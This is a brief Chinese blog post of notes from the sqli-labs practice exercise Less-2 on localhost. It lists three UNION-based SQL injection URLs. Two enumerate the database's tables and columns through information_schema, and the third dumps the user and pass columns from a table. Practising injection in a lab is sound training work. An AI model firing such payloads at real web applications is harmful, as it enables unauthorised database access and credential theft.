查询库中的所有表:http://127.0.0.1/sqli/Less-2/?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=0x74657374(test的hex)

查询表的字段:http://127.0.0.1/sqli/Less-2/?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=0x74657374

http://127.0.0.1/sqli/Less-2/?id=-1%20union%20select%201,user,pass%20from%20test.test1

posted on 2023-10-12 21:16  na2co3-  阅读(12)  评论(0)    收藏  举报